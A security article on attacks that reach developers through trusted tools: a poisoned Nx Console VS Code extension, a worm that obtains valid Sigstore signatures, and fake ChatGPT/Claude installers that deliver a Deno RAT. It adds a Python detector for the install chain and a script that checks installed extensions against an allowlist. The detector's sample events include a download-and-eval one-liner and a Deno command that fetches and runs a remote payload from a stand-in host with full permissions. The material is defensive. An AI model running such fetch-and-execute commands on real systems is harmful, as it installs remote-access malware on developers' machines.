Poisoned VS Code extensions and the new GitHub attack surface
Poisoned VS Code extensions and fake AI installers are attack techniques in which malicious or compromised tools are distributed through trusted developer channels such as GitHub and official marketplaces, letting attackers hijack software supply chains, steal credentials, and plant remote access malware directly in developers’ workflows. The breach GitHub confirmed on May 20 shows how powerful this vector has become: a single compromised VS Code extension on one employee’s machine gave attackers access to roughly 3,800 internal repositories. The extension, Nx Console, was a widely used developer tool with 2.2 million installs. Its malicious version was live on the Visual Studio Marketplace for only about 18 minutes, but clients with extension auto-update enabled that checked for updates during that window pulled it without any user action, so the small window was enough. Instead of breaking in through a traditional exploit, the attackers turned a trusted update mechanism into their entry point, which is why VS Code extension security must be treated as a core part of modern DevSecOps.

Inside the Nx Console supply chain compromise and TeamPCP’s worm
The Nx Console incident was not an isolated mishap but one wave in a broader campaign by the threat group known as TeamPCP, tracked by Google’s Threat Intelligence Group as UNC6780. According to research from Trend Micro, StepSecurity, and Snyk, the group’s Mini Shai-Hulud worm has driven at least seven confirmed supply chain waves since March, hitting tools like Trivy, Checkmarx KICS, LiteLLM, Bitwarden CLI, TanStack, and Mistral before reaching GitHub itself. The worm automates GitHub supply chain attacks by stealing CI/CD credentials from the environments it lands in and using them to publish malware in developer tools, then rapidly iterating on payloads. Palo Alto Networks’ Unit 42 observed three payload versions shipped within hours, with one script replaced only two hours after the first release. Mini Shai-Hulud now calls Fulcio and Rekor at runtime to obtain valid Sigstore signing certificates. Fulcio issues a short-lived certificate to whichever identity presents a valid OIDC token, so when the worm runs inside a compromised CI job it can sign with that job’s own identity and have the signature recorded in Rekor like any legitimate release; the poisoned package then passes signature verification even though attackers control the entire build chain. The practical caveat is that a valid Sigstore signature proves which workflow identity signed an artifact, not that the workflow was uncompromised: verification must check the certificate’s issuer and subject against the expected publisher, and even then it cannot substitute for protecting the build environment itself.

Fake ChatGPT and Claude installers delivering Deno RAT malware
Attackers are also abusing developer trust in AI tools through fake AI installers. On GitHub and SourceForge, counterfeit installers claim to provide access to ChatGPT, Claude, and even music production tools like AutoTune, Kontakt, Ableton Live, and ZENOLOGY, but instead deliver malware. Malwarebytes reports that these projects lure victims from compromised YouTube channels where AI-generated videos promote the bogus downloads, with more than 50,000 views recorded. The infection chain relies on social engineering rather than an exploit: users are told to paste a terminal command that installs Scoop and WinGet, then the legitimate Deno runtime. Deno is then used to fetch the DinDoor backdoor from a remote server and execute it in memory, so no installer file ever has to be written to disk. Deno’s permission sandbox does not help here: the attacker supplies the command line, and with it whatever permission flags the payload needs. DinDoor establishes persistence, gathers system details, and loads a Deno-based remote access Trojan (RAT) previously tracked as Smokest, which can run commands, manage files, capture screenshots, and open SOCKS5 proxies for browser hijacking and crypto theft.
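Detection logic for the chain described above, as an added example that is not part of the original article and not Malwarebytes’ code. It runs over constructed process-creation events (command lines only) and tags three stages: a download-and-eval one-liner of the kind used to bootstrap Scoop, a Scoop or WinGet install of Deno, and Deno running a module straight from a remote URL with broad permissions. The hostnames, paths and process IDs in the sample events are made up.

```python
"""Detection heuristics for the fake-AI-installer chain: paste-and-run bootstrap,
Deno installed via Scoop/WinGet, then Deno executing a remote module.

Added example; not code from the original article or from Malwarebytes. The
process events below are constructed for illustration, not real telemetry.
"""
import re
import shlex

# Scoop's own installer is bootstrapped by piping Invoke-RestMethod into
# Invoke-Expression; any "download it and eval it" one-liner has the same shape.
DOWNLOAD_EVAL = re.compile(
    r"\b(?:irm|iwr|Invoke-RestMethod|Invoke-WebRequest)\b[^|]*\|\s*(?:iex|Invoke-Expression)\b",
    re.IGNORECASE,
)
# Bare flags that remove most of Deno's sandbox. Scoped forms such as
# --allow-net=deno.land are deliberately not treated as broad.
DENO_BROAD_PERMS = {"-A", "--allow-all", "--allow-net", "--allow-run", "--allow-write", "--allow-env"}
REMOTE_MODULE = re.compile(r"^https?://", re.IGNORECASE)
INSTALLERS = {"scoop", "scoop.cmd", "scoop.ps1", "winget", "winget.exe"}
CHAIN_STAGES = ("download-and-eval", "deno-install", "deno-remote-module")


def _argv(cmdline: str) -> list[str]:
    """Split a Windows-style command line on whitespace, keeping quoted paths whole."""
    try:
        parts = shlex.split(cmdline, posix=False)  # non-POSIX: backslashes stay literal
    except ValueError:  # unbalanced quotes; fall back to a plain split
        parts = cmdline.split()
    return [p.strip('"') for p in parts]


def classify(cmdline: str) -> list[str]:
    """Return the indicator tags that fire for one process command line."""
    tags = []
    if DOWNLOAD_EVAL.search(cmdline):
        tags.append("download-and-eval")
    argv = _argv(cmdline)
    if not argv:
        return tags
    exe = argv[0].lower().replace("\\", "/").rsplit("/", 1)[-1]
    lowered = [a.lower() for a in argv[1:]]
    if exe in ("deno", "deno.exe") and "run" in argv:
        run_args = argv[argv.index("run") + 1:]
        if any(REMOTE_MODULE.match(a) for a in run_args):
            tags.append("deno-remote-module")
        if any(a in DENO_BROAD_PERMS for a in run_args):
            tags.append("deno-broad-permissions")
    elif exe in INSTALLERS and "install" in lowered and "deno" in lowered:
        tags.append("deno-install")
    return tags


def scan(events):
    """Return (pid, tags) for every event that trips at least one indicator."""
    hits = []
    for event in events:
        tags = classify(event["cmd"])
        if tags:
            hits.append((event["pid"], tags))
    return hits


def infection_chain_observed(events) -> bool:
    """True when all three stages were seen on this host, in any order and across
    any time gap. Stage 1 on its own is noisy; the combination is not."""
    seen = set()
    for event in events:
        seen.update(classify(event["cmd"]))
    return all(stage in seen for stage in CHAIN_STAGES)


# Constructed process-creation events for one host (command lines only).
SAMPLE_EVENTS = [
    {"pid": 4120, "cmd": 'powershell.exe -NoProfile -c "irm get.scoop.sh | iex"'},
    {"pid": 4188, "cmd": '"C:\\Users\\dev\\scoop\\shims\\scoop.cmd" install deno'},
    {"pid": 4250, "cmd": '"C:\\Users\\dev\\scoop\\shims\\deno.exe" run -A --no-prompt '
                         'https://cdn.example.invalid/setup/claude.ts'},
    {"pid": 4310, "cmd": "deno run --allow-net=deno.land main.ts"},  # benign local script
    {"pid": 4400, "cmd": "code.exe --install-extension ms-python.python"},
]

if __name__ == "__main__":
    for pid, tags in scan(SAMPLE_EVENTS):
        print(pid, ", ".join(tags))
    print("chain observed:", infection_chain_observed(SAMPLE_EVENTS))
```

The download-and-eval indicator alone will also match Scoop’s legitimate installer, so it is a poor alert by itself; the value is in correlating the three stages on one host, which is what infection_chain_observed does. In production the command lines come from process-creation telemetry such as Sysmon event ID 1 or Windows event 4688 with command-line auditing enabled.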

How these GitHub supply chain attacks compromise developers
Although the techniques differ, the poisoned VS Code extension and fake AI installers share a common strategy: they weaponize tools developers already depend on. In the Nx Console case, attackers rode the auto-update mechanism for a popular VS Code extension, turning a trusted marketplace into a delivery channel for a worm that spread through CI/CD systems and open-source ecosystems. In the Deno RAT campaigns, GitHub repositories and YouTube tutorials mimic legitimate AI workflows, transforming routine tasks—installing a ChatGPT or Claude client—into malware delivery. Both attack patterns exploit habits such as copy‑pasting shell commands, accepting default permissions, and assuming any popular GitHub project is safe. Once inside developer environments, they can steal credentials, push malicious package updates, and hijack browsers or crypto wallets, converting a single infected workstation into a distribution point for further GitHub supply chain attacks.

Practical defenses: securing VS Code extensions and AI tools
Developers cannot avoid modern tooling, but they can reduce the risk from malware in developer tools by tightening their personal and project security practices. Treat every VS Code extension and GitHub repository as untrusted until proven otherwise: verify the publisher, check the commit history, compare checksums where the project publishes them, and pin critical extensions to reviewed versions instead of auto‑updating blindly (in VS Code, setting extensions.autoUpdate and extensions.autoCheckUpdates to false stops silent updates, at the cost of having to apply updates deliberately and on a schedule). For AI-related software, avoid copy‑pasting commands from YouTube descriptions, and install clients and SDKs only from links on the official vendor sites. Practice strong account hygiene: enable multi-factor authentication for GitHub and extension marketplaces, use unique passwords, and monitor login history and OAuth app authorizations for anomalies. Finally, integrate security checks into your workflow: run dependency scanners, watch advisories for your tools, and respond quickly to suspicious activity. VS Code extension security and AI toolchain hygiene are now a core part of defending both your code and your organization.
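One way to put the pinning advice into practice, as an added example that is neither the article’s own code nor VS Code’s: a script that parses the output of code --list-extensions --show-versions (one publisher.name@version per line) and reports any installed extension that is unapproved or has drifted from its reviewed version. The allowlist, the sample listing and the examplepub.build-helper extension are constructed; the two settings it prints, extensions.autoUpdate and extensions.autoCheckUpdates, are real VS Code settings.

```python
"""Audit installed VS Code extensions against a pinned, human-reviewed allowlist.

Added example; not code from the original article or from VS Code. Feed it the
output of `code --list-extensions --show-versions`. The listing and allowlist
below are constructed, and examplepub.build-helper is a hypothetical extension.
"""
import json
import re
import subprocess
import sys

# publisher.name@version, as printed by `code --list-extensions --show-versions`
LINE = re.compile(r"^(?P<id>[A-Za-z0-9][\w-]*\.[\w-]+)@(?P<version>[0-9][\w.\-]*)$")

# Known-good versions, each reviewed before being added here (constructed).
ALLOWLIST = {
    "ms-python.python": "2024.14.1",
    "esbenp.prettier-vscode": "11.0.0",
    "examplepub.build-helper": "2.4.0",  # hypothetical extension
}

# Constructed stand-in for the live listing: one pinned extension has moved
# to a newer version on its own, and one extension was never approved.
SAMPLE_LISTING = """\
ms-python.python@2024.14.1
esbenp.prettier-vscode@11.0.0
examplepub.build-helper@2.5.0
somebody.random-theme@0.0.1
"""


def parse_listing(text: str) -> dict:
    """Map extension id (lower-cased; marketplace ids are case-insensitive) to version."""
    installed = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        match = LINE.match(line)
        if not match:
            raise ValueError(f"unrecognised listing line: {line!r}")
        installed[match["id"].lower()] = match["version"]
    return installed


def audit(installed: dict, allowlist: dict) -> dict:
    """Bucket every installed extension as ok, version_drift or unapproved,
    and list approved extensions that are not installed at all."""
    allow = {k.lower(): v for k, v in allowlist.items()}
    report = {"ok": [], "version_drift": [], "unapproved": [], "missing": []}
    for ext, version in installed.items():
        if ext not in allow:
            report["unapproved"].append(ext)
        elif version == allow[ext]:
            report["ok"].append(ext)
        else:
            report["version_drift"].append((ext, allow[ext], version))
    report["missing"] = sorted(set(allow) - set(installed))
    return report


def remediation(report: dict) -> list[str]:
    """CLI commands that would restore the pinned set; review before running."""
    cmds = [f"code --install-extension {ext}@{pinned}"
            for ext, pinned, _ in report["version_drift"]]
    cmds += [f"code --uninstall-extension {ext}" for ext in report["unapproved"]]
    return cmds


def pin_settings() -> dict:
    """User settings that stop VS Code from updating extensions silently."""
    return {"extensions.autoUpdate": False, "extensions.autoCheckUpdates": False}


if __name__ == "__main__":
    text = SAMPLE_LISTING
    if "--live" in sys.argv:  # read the real listing from the VS Code CLI
        text = subprocess.run(["code", "--list-extensions", "--show-versions"],
                              capture_output=True, text=True, check=True).stdout
    report = audit(parse_listing(text), ALLOWLIST)
    print(json.dumps(report, indent=2))
    for cmd in remediation(report):
        print(cmd)
    print("settings.json additions:", json.dumps(pin_settings()))
```

Run it with --live to audit the real machine. Pinning only reduces risk if the pinned versions were actually reviewed and are re-reviewed on a cadence; otherwise it just freezes whatever was installed, known-bad or not. What it does buy you is that a client sitting on a reviewed version never asks the marketplace for a build that was live for 18 minutes.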
